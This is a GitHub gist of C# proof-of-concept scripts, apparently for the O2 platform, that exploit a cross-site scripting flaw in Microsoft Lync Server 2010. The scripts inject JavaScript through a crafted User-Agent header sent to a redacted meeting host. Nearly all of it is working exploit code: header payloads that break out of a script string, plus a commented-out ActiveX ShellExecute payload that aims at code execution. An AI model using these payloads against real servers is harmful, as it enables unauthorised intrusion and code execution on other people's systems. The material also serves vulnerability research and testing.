Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Lync 2010 XSS on UserAgent PoCs
var topPanel = panel.add_Panel(true);
WebClient client = new WebClient ();
Action<string> sendRequest =
(payload)=>{
client.Headers.Add ("user-agent",payload);
var codeViewer = topPanel.add_SourceCodeViewer();
var url = "https://meet.AAAAAA.co.uk";
var stream = client.OpenRead(url);
var reader = new StreamReader(stream);
var html = reader.ReadToEnd();
stream.Close ();
reader.Close ();
codeViewer.set_Text(html)
.gotoLine(28);
};
//sendRequest("Custom-UserAgent;");
sendRequest("XSS; \"; \r\n alert('xss'); // diagInfo = \"");
return client;
//using System.IO
//using System.Net
//O2Ref:System.Net.dll
var topPanel = panel.add_Panel(true);
var browser = topPanel.add_WebBrowser();
var payload = "Custom USER AGENT;";
payload += " \"; document.write('<h1>xss</h2>'); //";
browser.Navigate("https://meet.AAAAAA.co.uk", null, null, b"User-Agent: " + payload);
browser.waitForCompleted();
return browser.get_Html();
// from http://whiteoaksecurity.com/blog/2013/1/11/microsoft-lync-server-2010-remote-code-executionxss-user-agent-header
// in most normal IE configs, the PoC below will throw permission denied
//payload += "var oShell = new ActiveXObject(\"Shell.Application\");oShell.ShellExecute(\"\",\"\",\"\",\"open\",\"1\"); //";
//var ie = "ie_inMKo_".o2Cache<WatiN_IE>(()=> panel.clear().add_IE()).silent(true); // ie randon value for o2cache makes this object to unique amongst multiple instances of this control
var ie = panel.clear().add_IE();
var payload = " \"; document.write('<h1>xss</h2>'); //";
ie.WebBrowser.Navigate("https://meet.AAAAAA.co.uk", null, null,
"User-Agent: " + payload);
ie.waitForComplete();
return ie.IE.Html;
//using FluentSharp.Watin;
//O2Ref:FluentSharp.Watin.dll
//O2Ref:WatiN.Core.dll
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.